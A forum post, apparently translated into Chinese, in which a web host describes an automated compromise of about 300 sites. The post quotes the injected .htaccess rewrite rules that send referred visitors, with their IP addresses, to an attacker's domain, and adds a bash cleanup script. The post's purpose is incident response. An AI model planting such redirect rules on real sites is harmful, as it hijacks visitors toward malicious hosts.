查找 Web 服务器漏洞

我们运营一个网络服务器场，托管着大约 300 个网站。

昨天早上，一个脚本放置了 www-data（apache 用户）拥有的 .htaccess 文件在每个目录中在大多数（但不是全部）网站的 document_root 下。

.htaccess 文件的内容如下：

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

谷歌搜索该网址（即“防病毒”的 md5 哈希值），我发现同样的事情在整个互联网上发生，我正在寻找已经处理过这个问题的人，并确定漏洞所在。

我搜索了大部分日志，但还没有找到任何确凿的证据。有没有其他人经历过同样的事情，并且在确定洞口方面比我走得更远？

到目前为止我们已经确定：

• 这些更改是以 www-data 的形式进行的，因此 apache 或它的插件可能是罪魁祸首
• 所有更改都是在 15 分钟内完成的，因此很可能是自动完成的
• 由于我们的网站域名千差万别，我认为一个网站上的单个漏洞是导致问题的原因（而不是每个网站上都有共同的漏洞）
• 如果 .htaccess 文件已经存在，并且可以通过 www-data 写入，那么脚本就很友好，只需将上述几行附加到文件末尾（使其易于逆转）

如能提供更多提示我将非常感激。

==编辑==

对于那些需要它的人，这是我用来清理 .htaccess 文件的脚本：

#!/bin/bash
PATT=84f6a4eef61784b33e4acbd32c8fdd72.com
DIR=/mnt
TMP=/tmp/`mktemp "XXXXXX"`
find $DIR -name .htaccess|while read FILE; do
  if ( grep $PATT "$FILE" > /dev/null); then
    if [ `cat "$FILE"|wc -l` -eq 4 ]; then
      rm "$FILE"
    else
      if ( tail -n1 "$FILE"|grep $PATT > /dev/null ); then
        rm $TMP
        cp "$FILE" $TMP
        LINES=`cat $TMP|wc -l`
        GOODLINES=$(($LINES-4))
        head -n $GOODLINES $TMP > "$FILE"
      else
        echo $FILE requires manual intervention
      fi
    fi
  fi
done